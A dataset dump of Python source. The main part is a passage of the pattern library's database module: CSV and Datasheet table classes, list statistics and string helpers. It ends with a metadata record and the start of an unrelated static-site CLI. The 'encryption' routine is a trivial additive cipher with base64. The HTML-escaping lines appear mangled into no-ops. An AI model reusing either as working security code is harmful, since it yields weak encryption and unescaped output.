for HTML interfaces.\n if value is None or value == \"\": # Don't do value != None because this includes 0.\n return default\n return decode_utf8(value)\n\n\nclass EncryptionError(Exception):\n pass\n\n\nclass DecryptionError(Exception):\n pass\n\n\ndef encrypt_string(s, key=\"\"):\n \"\"\" Returns the given string as an encrypted bytestring.\n \"\"\"\n key += \" \"\n a = []\n for i in range(len(s)):\n try:\n a.append(chr(ord(s[i]) + ord(key[i % len(key)]) % 256).encode(\"latin-1\"))\n except:\n raise EncryptionError()\n s = b\"\".join(a)\n s = base64.urlsafe_b64encode(s)\n return s\n\n\ndef decrypt_string(s, key=\"\"):\n \"\"\" Returns the given string as a decrypted Unicode string.\n \"\"\"\n key += \" \"\n s = base64.urlsafe_b64decode(s)\n s = s.decode(\"latin-1\")\n a = []\n for i in range(len(s)):\n try:\n a.append(chr(ord(s[i]) - ord(key[i % len(key)]) % 256))\n except:\n raise DecryptionError()\n s = \"\".join(a)\n s = decode_utf8(s)\n return s\n\n\n#### LIST FUNCTIONS ################################################################################\n\n\ndef order(list, cmp=None, key=None, reverse=False):\n \"\"\" Returns a list of indices in the order as when the given list is sorted.\n For example: [\"c\",\"a\",\"b\"] => [1, 2, 0]\n This means that in the sorted list, \"a\" (index 1) comes first and \"c\" (index 0) last.\n \"\"\"\n if cmp and key:\n f = lambda i, j: cmp(key(list[i]), key(list[j]))\n elif cmp:\n f = lambda i, j: cmp(list[i], list[j])\n elif key:\n f = lambda i, j: int(key(list[i]) >= key(list[j])) * 2 - 1\n else:\n f = lambda i, j: int(list[i] >= list[j]) * 2 - 1\n return sorted(range(len(list)), key=cmp_to_key(f), reverse=reverse)\n\n_order = order\n\n\ndef avg(list):\n \"\"\" Returns the arithmetic mean of the given list of values.\n For example: mean([1,2,3,4]) = 10/4 = 2.5.\n \"\"\"\n return float(_sum(list)) / (len(list) or 1)\n\n\ndef variance(list):\n \"\"\" Returns the variance of the given list of values.\n The variance is the average of squared deviations from the mean.\n \"\"\"\n a = avg(list)\n return _sum([(x - a)**2 for x in list]) / (len(list) - 1 or 1)\n\n\ndef stdev(list):\n \"\"\" Returns the standard deviation of the given list of values.\n Low standard deviation => values are close to the mean.\n High standard deviation => values are spread out over a large range.\n \"\"\"\n return sqrt(variance(list))\n\n#### FIELD #########################################################################################\n\n\nclass _String(str):\n # The STRING constant can be called with a length when passed to field(),\n # for example field(\"language\", type=STRING(2), default=\"en\", index=True).\n def __new__(self):\n return str.__new__(self, \"string\")\n\n def __call__(self, length=100):\n return \"varchar(%s)\" % (length > 255 and 255 or (length < 1 and 1 or length))\n\n# Field type.\n# Note: SQLite string fields do not impose a string limit.\n# Unicode strings have more characters than actually displayed (e.g. \"♥\").\n# Boolean fields are stored as tinyint(1), int 0 or 1.\nSTRING, INTEGER, FLOAT, TEXT, BLOB, BOOLEAN, DATE = \\\n _String(), \"integer\", \"float\", \"text\", \"blob\", \"boolean\", \"date\"\n\nSTR, INT, BOOL = STRING, INTEGER, BOOLEAN\n\n\n#--- QUERY -----------------------------------------------------------------------------------------\n\n\n\n# Sorting:\nASCENDING = \"asc\"\nDESCENDING = \"desc\"\n\n# Grouping:\nFIRST, LAST, COUNT, MAX, MIN, SUM, AVG, STDEV, CONCATENATE = \\\n \"first\", \"last\", \"count\", \"max\", \"min\", \"sum\", \"avg\", \"stdev\", \"group_concat\"\n\n\n#### DATASHEET #####################################################################################\n\n#--- CSV -------------------------------------------------------------------------------------------\n\n# Raise the default field size limit:\nif sys.platform == 'win32':\n csvlib.field_size_limit(min(sys.maxsize, 2147483647))\nelse:\n csvlib.field_size_limit(sys.maxsize)\n\n\ndef csv_header_encode(field, type=STRING):\n # csv_header_encode(\"age\", INTEGER) => \"age (INTEGER)\".\n t = re.sub(r\"^varchar\\(.*?\\)\", \"string\", (type or \"\"))\n t = t and \" (%s)\" % t or \"\"\n s = \"%s%s\" % (field or \"\", t.upper())\n return s\n\n\ndef csv_header_decode(s):\n # csv_header_decode(\"age (INTEGER)\") => (\"age\", INTEGER).\n p = r\"STRING|INTEGER|FLOAT|TEXT|BLOB|BOOLEAN|DATE|\"\n p = re.match(r\"(.*?) \\((\" + p + r\")\\)\", s)\n s = s.endswith(\" ()\") and s[:-3] or s\n return p and (string(p.group(1), default=None), p.group(2).lower()) or (string(s) or None, None)\n\n\nclass CSV(list):\n\n def __new__(cls, rows=[], fields=None, **kwargs):\n \"\"\" A list of lists that can be imported and exported as a comma-separated text file (CSV).\n \"\"\"\n if isinstance(rows, str) and os.path.exists(rows):\n csv = cls.load(rows, **kwargs)\n else:\n csv = list.__new__(cls)\n return csv\n\n def __init__(self, rows=[], fields=None, **kwargs):\n # List of (name, type)-tuples (STRING, INTEGER, FLOAT, DATE, BOOLEAN).\n fields = fields or kwargs.pop(\"headers\", None)\n fields = fields and [tuple(f) if isinstance(f, (tuple, list)) else (f, None) for f in fields] or None\n self.__dict__[\"fields\"] = fields\n if hasattr(rows, \"__iter__\"):\n self.extend(rows, **kwargs)\n\n def extend(self, rows, **kwargs):\n list.extend(self, rows)\n\n def _set_headers(self, v):\n self.__dict__[\"fields\"] = v\n\n def _get_headers(self):\n return self.__dict__[\"fields\"]\n\n headers = property(_get_headers, _set_headers)\n\n def save(self, path, separator=\",\", encoder=lambda v: v, headers=False, password=None, **kwargs):\n \"\"\" Exports the table to a unicode text file at the given path.\n Rows in the file are separated with a newline.\n Columns in a row are separated with the given separator (by default, comma).\n For data types other than string, int, float, bool or None, a custom string encoder can be given.\n \"\"\"\n # Optional parameters include all arguments for csv.writer(), see:\n # http://docs.python.org/library/csv.html#csv.writer\n kwargs.setdefault(\"delimiter\", separator)\n kwargs.setdefault(\"quoting\", csvlib.QUOTE_ALL)\n # csv.writer will handle str, int, float and bool:\n s = StringIO()\n w = csvlib.writer(s, **kwargs)\n if headers and self.fields is not None:\n w.writerows([[csv_header_encode(name, type) for name, type in self.fields]])\n w.writerows([[encoder(v) for v in row] for row in self])\n s = s.getvalue()\n s = s.strip()\n s = re.sub(\"([^\\\"]|^)\\\"None\\\"\", \"\\\\1None\", s)\n s = s if not password else encrypt_string(s, password)\n f = open(path, \"w\", encoding=\"utf-8\")\n f.write(BOM_UTF8)\n f.write(s)\n f.close()\n\n @classmethod\n def load(cls, path, separator=\",\", decoder=lambda v: v, headers=False, preprocess=None, password=None, **kwargs):\n \"\"\" Returns a table from the data in the given text file.\n Rows are expected to be separated by a newline.\n Columns are expected to be separated by the given separator (by default, comma).\n Strings will be converted to int, float, bool, date or None if headers are parsed.\n For other data types, a custom string decoder can be given.\n A preprocess(str) function can be given to change the file content before parsing.\n \"\"\"\n # Date objects are saved and loaded as strings, but it is easy to convert these back to dates:\n # - set a DATE field type for the column,\n # - or do Table.columns[x].map(lambda s: date(s))\n f = open(path, \"r\", encoding=\"utf-8\")\n\n data = f if not password else decrypt_string(f.read(), password)\n data.seek(data.readline().startswith(BOM_UTF8) and 3 or 0)\n data = data if not password else BytesIO(data.replace(\"\\r\\n\", \"\\n\").replace(\"\\r\", \"\\n\"))\n data = data if not preprocess else BytesIO(preprocess(data.read()))\n data = csvlib.reader(data, delimiter=separator)\n\n i, n = kwargs.get(\"start\"), kwargs.get(\"count\")\n if i is not None and n is not None:\n data = list(islice(data, i, i + n))\n elif i is not None:\n data = list(islice(data, i, None))\n elif n is not None:\n data = list(islice(data, n))\n else:\n data = list(data)\n\n f.close()\n del f\n\n if headers:\n fields = [csv_header_decode(field) for field in data.pop(0)]\n fields += [(None, None)] * (max([0] + [len(row) for row in data]) - len(fields))\n else:\n fields = []\n if not fields:\n # Cast fields using the given decoder (by default, all strings + None).\n data = [[decoder(decode_utf8(v) if v != \"None\" else None) for v in row] for row in data]\n else:\n # Cast fields to their defined field type (STRING, INTEGER, ...)\n for i, row in enumerate(data):\n for j, v in enumerate(row):\n type = fields[j][1]\n if row[j] == \"None\":\n row[j] = decoder(None)\n elif type is None:\n row[j] = decoder(decode_utf8(v))\n elif type in (STRING, TEXT):\n row[j] = decode_utf8(v)\n elif type == INTEGER:\n row[j] = int(row[j])\n elif type == FLOAT:\n row[j] = float(row[j])\n elif type == BOOLEAN:\n row[j] = bool(row[j])\n elif type == DATE:\n row[j] = date(row[j])\n elif type == BLOB:\n row[j] = v\n else:\n row[j] = decoder(decode_utf8(v))\n return cls(rows=data, fields=fields, **kwargs)\n\n#--- DATASHEET -------------------------------------------------------------------------------------\n\n\nclass Datasheet(CSV):\n\n def __init__(self, rows=[], fields=None, **kwargs):\n \"\"\" A matrix of rows and columns, where each row and column can be retrieved as a list.\n Values can be any kind of Python object.\n \"\"\"\n # NumPy array, convert to list of int/float/str/bool.\n if rows.__class__.__name__ == \"ndarray\":\n rows = rows.tolist()\n self.__dict__[\"_rows\"] = DatasheetRows(self)\n self.__dict__[\"_columns\"] = DatasheetColumns(self)\n self.__dict__[\"_m\"] = 0 # Number of columns per row, see Datasheet.insert().\n list.__init__(self)\n CSV.__init__(self, rows, fields, **kwargs)\n\n def _get_rows(self):\n return self._rows\n\n def _set_rows(self, rows):\n # Datasheet.rows property can't be set, except in special case Datasheet.rows += row.\n if isinstance(rows, DatasheetRows) and rows._datasheet == self:\n self._rows = rows\n return\n raise AttributeError(\"can't set attribute\")\n rows = property(_get_rows, _set_rows)\n\n def _get_columns(self):\n return self._columns\n\n def _set_columns(self, columns):\n # Datasheet.columns property can't be set, except in special case Datasheet.columns += column.\n if isinstance(columns, DatasheetColumns) and columns._datasheet == self:\n self._columns = columns\n return\n raise AttributeError(\"can't set attribute\")\n columns = cols = property(_get_columns, _set_columns)\n\n def __getattr__(self, k):\n \"\"\" Columns can be retrieved by field name, e.g., Datasheet.date.\n \"\"\"\n #print(\"Datasheet.__getattr__\", k)\n if k in self.__dict__:\n return self.__dict__[k]\n for i, f in enumerate(f[0] for f in self.__dict__[\"fields\"] or []):\n if f == k:\n return self.__dict__[\"_columns\"][i]\n raise AttributeError(\"'Datasheet' object has no attribute '%s'\" % k)\n\n def __setattr__(self, k, v):\n \"\"\" Columns can be set by field name, e.g., Datasheet.date = [...].\n \"\"\"\n #print(\"Datasheet.__setattr__\", k)\n if k in self.__dict__:\n self.__dict__[k] = v\n return\n if k == \"rows\":\n self._set_rows(v)\n return\n if k == \"columns\":\n self._set_columns(v)\n return\n if k == \"headers\":\n self._set_headers(v)\n return\n for i, f in enumerate(f[0] for f in self.__dict__[\"fields\"] or []):\n if f == k:\n self.__dict__[\"_columns\"].__setitem__(i, v)\n return\n raise AttributeError(\"'Datasheet' object has no attribute '%s'\" % k)\n\n def __setitem__(self, index, value):\n \"\"\" Sets an item or row in the matrix.\n For Datasheet[i] = v, sets the row at index i to v.\n For Datasheet[i,j] = v, sets the value in row i and column j to v.\n \"\"\"\n if isinstance(index, tuple):\n list.__getitem__(self, index[0])[index[1]] = value\n elif isinstance(index, int):\n self.pop(index)\n self.insert(index, value)\n else:\n raise TypeError(\"Datasheet indices must be int or tuple\")\n\n def __getitem__(self, index):\n \"\"\" Returns an item, row or slice from the matrix.\n For Datasheet[i], returns the row at the given index.\n For Datasheet[i,j], returns the value in row i and column j.\n \"\"\"\n if isinstance(index, int):\n # Datasheet[i] => row i.\n return list.__getitem__(self, index)\n elif isinstance(index, slice):\n return Datasheet(rows = list.__getitem__(self, index), fields = self.fields)\n elif isinstance(index, tuple):\n i, j = index\n # Datasheet[i,j] => item from column j in row i.\n # Datasheet[i,j1:j2] => columns j1-j2 from row i.\n if not isinstance(i, slice):\n return list.__getitem__(self, i)[j]\n # Datasheet[i1:i2,j] => column j from rows i1-i2.\n if not isinstance(j, slice):\n return [row[j] for row in list.__getitem__(self, i)]\n # Datasheet[i1:i2,j1:j2] => Datasheet with columns j1-j2 from rows i1-i2.\n return Datasheet(\n rows = (row[j] for row in list.__getitem__(self, i)),\n fields = self.fields and self.fields[j] or self.fields)\n raise TypeError(\"Datasheet indices must be int, tuple or slice\")\n\n # Python 2 (backward compatibility)\n __getslice__ = lambda self, i, j: self.__getitem__(slice(i, j))\n\n def __delitem__(self, index):\n self.pop(index)\n\n # datasheet1 = datasheet2 + datasheet3\n # datasheet1 = [[...],[...]] + datasheet2\n # datasheet1 += datasheet2\n def __add__(self, datasheet):\n m = self.copy()\n m.extend(datasheet)\n return m\n\n def __radd__(self, datasheet):\n m = Datasheet(datasheet)\n m.extend(self)\n return m\n\n def __iadd__(self, datasheet):\n self.extend(datasheet)\n return self\n\n def insert(self, i, row, default=None, **kwargs):\n \"\"\" Inserts the given row into the matrix.\n Missing columns at the end (right) will be filled with the default value.\n \"\"\"\n try:\n # Copy the row (fast + safe for generators and DatasheetColumns).\n row = [v for v in row]\n except:\n raise TypeError(\"Datasheet.insert(x): x must be list\")\n list.insert(self, i, row)\n m = max((len(self) > 1 and self._m or 0, len(row)))\n if len(row) < m:\n row.extend([default] * (m - len(row)))\n if self._m < m:\n # The given row might have more columns than the rows in the matrix.\n # Performance takes a hit when these rows have to be expanded:\n for row in self:\n if len(row) < m:\n row.extend([default] * (m - len(row)))\n self.__dict__[\"_m\"] = m\n\n def append(self, row, default=None, _m=None, **kwargs):\n self.insert(len(self), row, default)\n\n def extend(self, rows, default=None, **kwargs):\n for row in rows:\n self.insert(len(self), row, default)\n\n def group(self, j, function=FIRST, key=lambda v: v):\n \"\"\" Returns a datasheet with unique values in column j by grouping rows with the given function.\n The function takes a list of column values as input and returns a single value,\n e.g. FIRST, LAST, COUNT, MAX, MIN, SUM, AVG, STDEV, CONCATENATE.\n The function can also be a list of functions (one for each column).\n TypeError will be raised when the function cannot handle the data in a column.\n The key argument can be used to map the values in column j, for example:\n key=lambda date: date.year to group Date objects by year.\n \"\"\"\n if isinstance(function, tuple):\n function = list(function)\n if not isinstance(function, list):\n function = [function] * self._m\n if len(function) < self._m:\n function += [FIRST] * (self._m - len(function))\n for i, f in enumerate(function):\n if i == j: # Group column j is always FIRST.\n f = FIRST\n if f == FIRST:\n function[i] = lambda a: a[+0]\n if f == LAST:\n function[i] = lambda a: a[-1]\n if f == COUNT:\n function[i] = lambda a: len(a)\n if f == MAX:\n function[i] = lambda a: max(a)\n if f == MIN:\n function[i] = lambda a: min(a)\n if f == SUM:\n function[i] = lambda a: _sum([x for x in a if x is not None])\n if f == AVG:\n function[i] = lambda a: avg([x for x in a if x is not None])\n if f == STDEV:\n function[i] = lambda a: stdev([x for x in a if x is not None])\n if f == CONCATENATE:\n function[i] = lambda a: \",\".join(decode_utf8(x) for x in a if x is not None)\n J = j\n # Map unique values in column j to a list of rows that contain this value.\n g = {}\n [g.setdefault(key(v), []).append(i) for i, v in enumerate(self.columns[j])]\n # Map unique values in column j to a sort index in the new, grouped list.\n o = [(g[v][0], v) for v in g]\n o = dict([(v, i) for i, (ii, v) in enumerate(sorted(o))])\n # Create a list of rows with unique values in column j,\n # applying the group function to the other columns.\n u = [None] * len(o)\n for v in g:\n # List the column values for each group row.\n u[o[v]] = [[list.__getitem__(self, i)[j] for i in g[v]] for j in range(self._m)]\n # Apply the group function to each row, except the unique value in column j.\n u[o[v]] = [function[j](column) for j, column in enumerate(u[o[v]])]\n u[o[v]][J] = v # list.__getitem__(self, i)[J]\n return Datasheet(rows=u)\n\n def record(self, row):\n \"\"\" Returns the given row as a dictionary of (field or alias, value)-items.\n \"\"\"\n return dict(list(zip((f for f, type in self.fields), row)))\n\n def map(self, function=lambda item: item):\n \"\"\" Applies the given function to each item in the matrix.\n \"\"\"\n for i, row in enumerate(self):\n for j, item in enumerate(row):\n row[j] = function(item)\n\n def slice(self, i, j, n, m):\n \"\"\" Returns a new Datasheet starting at row i and column j and spanning n rows and m columns.\n \"\"\"\n return Datasheet(rows=[list.__getitem__(self, i)[j:j + m] for i in range(i, i + n)])\n\n def copy(self, rows=ALL, columns=ALL):\n \"\"\" Returns a new Datasheet from a selective list of row and/or column indices.\n \"\"\"\n if rows == ALL and columns == ALL:\n return Datasheet(rows=self)\n if rows == ALL:\n return Datasheet(rows=list(zip(*(self.columns[j] for j in columns))))\n if columns == ALL:\n return Datasheet(rows=(self.rows[i] for i in rows))\n z = list(zip(*(self.columns[j] for j in columns)))\n return Datasheet(rows=(z[i] for i in rows))\n\n @property\n def array(self):\n \"\"\" Returns a NumPy array.\n Arrays must have elements of the same type, and rows of equal size.\n \"\"\"\n import numpy\n return numpy.array(self)\n\n @property\n def json(self, **kwargs):\n \"\"\" Returns a JSON-string, as a list of dictionaries (if fields are defined) or as a list of lists.\n This is useful for sending a Datasheet to JavaScript, for example.\n \"\"\"\n kwargs.setdefault(\"ensure_ascii\", False) # Disable simplejson's Unicode encoder.\n if self.fields is not None:\n s = json.dumps([dict((f[0], row[i]) for i, f in enumerate(self.fields)) for row in self], **kwargs)\n else:\n s = json.dumps(self, **kwargs)\n return decode_utf8(s)\n\n @property\n def html(self):\n \"\"\" Returns a HTML-string with a .\n This is useful for viewing the data, e.g., open(\"data.html\", \"wb\").write(datasheet.html).\n \"\"\"\n def encode(s):\n s = \"%s\" % s\n s = s.replace(\"&\", \"&\")\n s = s.replace(\"<\", \"<\")\n s = s.replace(\">\", \">\")\n s = s.replace(\"-\", \"‑\")\n s = s.replace(\"\\n\", \"
    \\n\")\n return s\n a = []\n a.append(\"\\n\")\n a.append(\"\\n\")\n a.append(\"
    \\n\")\n if self.fields is not None:\n a.append(\"\\n\")\n a.append(\"\\t\\n\" % \"#\")\n a.extend(\"\\t\\n\" % encode(f[0]) for f in self.fields)\n a.append(\"\\n\")\n for i, row in enumerate(self):\n a.append(\"\\n\")\n a.append(\"\\t\\n\" % (i + 1))\n a.extend(\"\\t\\n\" % encode(v) for v in row)\n a.append(\"\\n\")\n a.append(\"
    %s%s
    %s%s
    \")\n return encode_utf8(\"\".join(a))\n\n\ndef flip(datasheet):\n \"\"\" Returns a new datasheet with rows for columns and columns for rows.\n \"\"\"\n return Datasheet(rows=datasheet.columns)\n\n\ndef csv(*args, **kwargs):\n \"\"\" Returns a Datasheet from the given CSV file path.\n \"\"\"\n if len(args) == 0:\n return Datasheet(**kwargs)\n return Datasheet.load(*args, **kwargs)\n\n#--- DATASHEET ROWS --------------------------------------------------------------------------------\n# Datasheet.rows mimics the operations on Datasheet:\n\n\nclass DatasheetRows(list):\n\n def __init__(self, datasheet):\n self._datasheet = datasheet\n\n def __setitem__(self, i, row):\n self._datasheet.pop(i)\n self._datasheet.insert(i, row)\n\n def __getitem__(self, i):\n return list.__getitem__(self._datasheet, i)\n\n def __getslice__(self, i, j):\n return self._datasheet[i:j]\n\n def __delitem__(self, i):\n self.pop(i)\n\n def __len__(self):\n return len(self._datasheet)\n\n def __iter__(self):\n for i in range(len(self)):\n yield list.__getitem__(self._datasheet, i)\n\n def __repr__(self):\n return repr(self._datasheet)\n\n def __add__(self, row):\n raise TypeError(\"unsupported operand type(s) for +: 'Datasheet.rows' and '%s'\" % row.__class__.__name__)\n\n def __iadd__(self, row):\n self.append(row)\n return self\n\n def __eq__(self, rows):\n return self._datasheet.__eq__(rows)\n\n def __ne__(self, rows):\n return self._datasheet.__ne__(rows)\n\n def insert(self, i, row, default=None):\n self._datasheet.insert(i, row, default)\n\n def append(self, row, default=None):\n self._datasheet.append(row, default)\n\n def extend(self, rows, default=None):\n self._datasheet.extend(rows, default)\n\n def remove(self, row):\n self._datasheet.remove(row)\n\n def pop(self, i):\n return self._datasheet.pop(i)\n\n def count(self, row):\n return self._datasheet.count(row)\n\n def index(self, row):\n return self._datasheet.index(row)\n\n def sort(self, cmp=None, key=None, reverse=False):\n self._datasheet.sort(cmp, key, reverse)\n\n def reverse(self):\n self._datasheet.reverse()\n\n def swap(self, i1, i2):\n self[i1], self[i2] = self[i2], self[i1]\n\n#--- DATASHEET COLUMNS -----------------------------------------------------------------------------\n\n\nclass DatasheetColumns(list):\n\n def __init__(self, datasheet):\n self._datasheet = datasheet\n self._cache = {} # Keep a reference to DatasheetColumn objects generated with Datasheet.columns[j].\n # This way we can unlink them when they are deleted.\n\n def __setitem__(self, j, column):\n if self._datasheet.fields is not None and j < len(self._datasheet.fields):\n # Preserve the column header if it exists.\n f = self._datasheet.fields[j]\n else:\n f = None\n self.pop(j)\n self.insert(j, column, field=f)\n\n def __getitem__(self, j):\n if j < 0:\n j = j % len(self) # DatasheetColumns[-1]\n if j >= len(self):\n raise IndexError(\"list index out of range\")\n return self._cache.setdefault(j, DatasheetColumn(self._datasheet, j))\n\n def __getslice__(self, i, j):\n return self._datasheet[:, i:j]\n\n def __delitem__(self, j):\n self.pop(j)\n\n def __len__(self):\n return len(self._datasheet) > 0 and len(self._datasheet[0]) or 0\n\n def __iter__(self):\n for i in range(len(self)):\n yield self.__getitem__(i)\n\n def __repr__(self):\n return repr(list(iter(self)))\n\n def __add__(self, column):\n raise TypeError(\"unsupported operand type(s) for +: 'Datasheet.columns' and '%s'\" % column.__class__.__name__)\n\n def __iadd__(self, column):\n self.append(column)\n return self\n\n def __eq__(self, columns):\n return list(self) == columns\n\n def __ne__(self, columns):\n return not self.__eq__(self, columns)\n\n def insert(self, j, column, default=None, field=None):\n \"\"\" Inserts the given column into the matrix.\n Missing rows at the end (bottom) will be filled with the default value.\n \"\"\"\n try:\n column = [v for v in column]\n except:\n raise TypeError(\"Datasheet.columns.insert(x): x must be list\")\n column = column + [default] * (len(self._datasheet) - len(column))\n if len(column) > len(self._datasheet):\n self._datasheet.extend([[None]] * (len(column) - len(self._datasheet)))\n for i, row in enumerate(self._datasheet):\n row.insert(j, column[i])\n self._datasheet.__dict__[\"_m\"] += 1 # Increase column count.\n # Add a new header.\n if self._datasheet.fields is not None:\n self._datasheet.fields += [(None, None)] * (len(self) - len(self._datasheet.fields) - 1)\n self._datasheet.fields.insert(j, field or (None, None))\n\n def append(self, column, default=None, field=None):\n self.insert(len(self), column, default, field)\n\n def extend(self, columns, default=None, fields=[]):\n for j, column in enumerate(columns):\n self.insert(len(self), column, default, j < len(fields) and fields[j] or None)\n\n def remove(self, column):\n if isinstance(column, DatasheetColumn) and column._datasheet == self._datasheet:\n self.pop(column._j)\n return\n raise ValueError(\"list.remove(x): x not in list\")\n\n def pop(self, j):\n column = list(self[j]) # Return a list copy.\n for row in self._datasheet:\n row.pop(j)\n # At one point a DatasheetColumn object was created with Datasheet.columns[j].\n # It might still be in use somewhere, so we unlink it from the datasheet:\n self._cache[j]._datasheet = Datasheet(rows=[[v] for v in column])\n self._cache[j]._j = 0\n self._cache.pop(j)\n for k in range(j + 1, len(self) + 1):\n if k in self._cache:\n # Shift the DatasheetColumn objects on the right to the left.\n self._cache[k - 1] = self._cache.pop(k)\n self._cache[k - 1]._j = k - 1\n self._datasheet.__dict__[\"_m\"] -= 1 # Decrease column count.\n # Remove the header.\n if self._datasheet.fields is not None:\n self._datasheet.fields.pop(j)\n return column\n\n def count(self, column):\n return len([True for c in self if c == column])\n\n def index(self, column):\n if isinstance(column, DatasheetColumn) and column._datasheet == self._datasheet:\n return column._j\n return list(self).index(column)\n\n def sort(self, cmp=None, key=None, reverse=False, order=None):\n # This makes most sense if the order in which columns should appear is supplied.\n if order and reverse is True:\n o = list(reversed(order))\n if order and reverse is False:\n o = list(order)\n if not order:\n o = _order(self, cmp, key, reverse)\n for i, row in enumerate(self._datasheet):\n # The main difficulty is modifying each row in-place,\n # since other variables might be referring to it.\n r = list(row)\n [row.__setitem__(i2, r[i1]) for i2, i1 in enumerate(o)]\n # Reorder the datasheet headers.\n if self._datasheet.fields is not None:\n self._datasheet.fields = [self._datasheet.fields[i] for i in o]\n\n def swap(self, j1, j2):\n self[j1], self[j2] = self[j2], self[j1]\n # Reorder the datasheet headers.\n if self._datasheet.fields is not None:\n self._datasheet.fields[j1], self._datasheet.fields[j2] = (\n self._datasheet.fields[j2],\n self._datasheet.fields[j1])\n\n#--- DATASHEET COLUMN ------------------------------------------------------------------------------\n\n\nclass DatasheetColumn(list):\n\n def __init__(self, datasheet, j):\n \"\"\" A dynamic column in a Datasheet.\n If the actual column is deleted with Datasheet.columns.remove() or Datasheet.columms.pop(),\n the DatasheetColumn object will be orphaned (i.e., it is no longer part of the table).\n \"\"\"\n self._datasheet = datasheet\n self._j = j\n\n def __getslice__(self, i, j):\n return list(list.__getitem__(self._datasheet, i)[self._j] for i in range(i, min(j, len(self._datasheet))))\n\n def __getitem__(self, i):\n return list.__getitem__(self._datasheet, i)[self._j]\n\n def __setitem__(self, i, value):\n list.__getitem__(self._datasheet, i)[self._j] = value\n\n def __len__(self):\n return len(self._datasheet)\n\n def __iter__(self): # Can be put more simply but optimized for performance:\n for i in range(len(self)):\n yield list.__getitem__(self._datasheet, i)[self._j]\n\n def __reversed__(self):\n return reversed(list(iter(self)))\n\n def __repr__(self):\n return repr(list(iter(self)))\n\n def __gt__(self, column):\n return list(self) > list(column)\n\n def __lt__(self, column):\n return list(self) < list(column)\n\n def __ge__(self, column):\n return list(self) >= list(column)\n\n def __le__(self, column):\n return list(self) <= list(column)\n\n def __eq__(self, column):\n return list(self) == column\n\n def __ne__(self, column):\n return not self.__eq__(column)\n\n def __add__(self, column):\n return list(self) + list(column)\n\n def __iadd__(self, column):\n self.extend(column)\n\n def __contains__(self, value):\n for v in self:\n if v == value:\n return True\n return False\n\n def count(self, value):\n return len([True for v in self if v == value])\n\n def index(self, value):\n for i, v in enumerate(self):\n if v == value:\n return i\n raise ValueError(\"list.index(x): x not in list\")\n\n def remove(self, value):\n \"\"\" Removes the matrix row that has the given value in this column.\n \"\"\"\n for i, v in enumerate(self):\n if v == value:\n self._datasheet.pop(i)\n return\n raise ValueError(\"list.remove(x): x not in list\")\n\n def pop(self, i):\n \"\"\" Removes the entire row from the matrix and returns the value at the given index.\n \"\"\"\n row = self._datasheet.pop(i)\n return row[self._j]\n\n def sort(self, cmp=None, key=None, reverse=False):\n \"\"\" Sorts the rows in the matrix according to the values in this column,\n e.g. clicking ascending / descending on a column header in a datasheet viewer.\n \"\"\"\n o = order(list(self), cmp, key, reverse)\n # Modify the table in place, more than one variable may be referencing it:\n r = list(self._datasheet)\n [self._datasheet.__setitem__(i2, r[i1]) for i2, i1 in enumerate(o)]\n\n def insert(self, i, value, default=None):\n \"\"\" Inserts the given value in the column.\n This will create a new row in the matrix, where other columns are set to the default.\n \"\"\"\n self._datasheet.insert(i, [default] * self._j + [value] + [default] * (len(self._datasheet) - self._j - 1))\n\n def append(self, value, default=None):\n self.insert(len(self), value, default)\n\n def extend(self, values, default=None):\n for value in values:\n self.insert(len(self), value, default)\n\n def map(self, function=lambda value: value):\n \"\"\" Applies the given function to each value in the column.\n \"\"\"\n for j, value in enumerate(self):\n self[j] = function(value)\n\n def filter(self, function=lambda value: True):\n \"\"\" Removes the matrix rows for which function(value) in the column is not True.\n \"\"\"\n i = len(self)\n for v in reversed(self):\n i -= 1\n if not function(v):\n self._datasheet.pop(i)\n\n def swap(self, i1, i2):\n self._datasheet.swap(i1, i2)\n\n#---------------------------------------------------------------------------------------------------\n\n_UID = 0\n\n\ndef uid():\n global _UID\n _UID += 1\n return _UID\n\n\ndef truncate(string, length=100):\n \"\"\" Returns a (head, tail)-tuple, where the head string length is less than the given length.\n Preferably the string is split at a space, otherwise a hyphen (\"-\") is injected.\n \"\"\"\n if len(string) <= length:\n return string, \"\"\n n, words = 0, string.split(\" \")\n for i, w in enumerate(words):\n if n + len(w) > length:\n break\n n += len(w) + 1\n if i == 0 and len(w) > length:\n return (w[:length - 1] + \"-\",\n (w[length - 1:] + \" \" + \" \".join(words[1:])).strip())\n return (\" \".join(words[:i]),\n \" \".join(words[i:]))\n\n_truncate = truncate\n\n\ndef pprint(datasheet, truncate=40, padding=\" \", fill=\".\"):\n \"\"\" Prints a string where the rows in the datasheet are organized in outlined columns.\n \"\"\"\n # Calculate the width of each column, based on the longest field in each column.\n # Long fields can be split across different lines, so we need to check each line.\n w = [0 for column in datasheet.columns]\n R = []\n for i, row in enumerate(datasheet.rows):\n fields = []\n for j, v in enumerate(row):\n # Cast each field in the row to a string.\n # Strings that span beyond the maximum column width are wrapped.\n # Thus, each \"field\" in the row is a list of lines.\n lines = []\n if not isinstance(v, str):\n v = str(v)\n for v in v.splitlines():\n v = decode_utf8(v.strip())\n while v:\n head, v = _truncate(v, truncate)\n lines.append(head)\n w[j] = max(w[j], len(head))\n fields.append(lines)\n R.append(fields)\n for i, fields in enumerate(R):\n # Add empty lines to each field so they are of equal height.\n n = max([len(lines) for lines in fields])\n fields = [lines + [\"\"] * (n - len(lines)) for lines in fields]\n # Print the row line per line, justifying the fields with spaces.\n columns = []\n for k in range(n):\n for j, lines in enumerate(fields):\n s = lines[k]\n s += ((k == 0 or len(lines[k]) > 0) and fill or \" \") * (w[j] - len(lines[k]))\n s += padding\n columns.append(s)\n print(\" \".join(columns))\n","sub_path":"pattern/db/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":46275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"119045600","text":"# coding=utf-8\nimport argparse\nimport logging\nimport sys\nimport time\n\nimport arrow\nfrom path import path\n\nfrom engineer.commands import all_commands, common_parser\nfrom engineer.log import get_console_handler, bootstrap\nfrom engineer.plugins import load_plugins\nfrom engineer import version\n\ntry:\n # noinspection PyPep8Naming\n import cPickle as pickle\nexcept ImportError:\n import pickle\n\n__author__ = 'Tyler Butler '\n\n\ndef get_argparser():\n # from engineer.commands.argh import PrintArghCommand\n desc = \"Engineer static site builder. [v%s, %s %s]\" % (version,\n version.date,\n time.strftime('%X',\n arrow.get(version.datetime).to(\n 'local').timetuple()))\n top_level_parser = argparse.ArgumentParser(prog='engineer',\n description=desc,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n subparsers = top_level_parser.add_subparsers(title=\"subcommands\",\n dest='parser_name')\n\n for command_class in 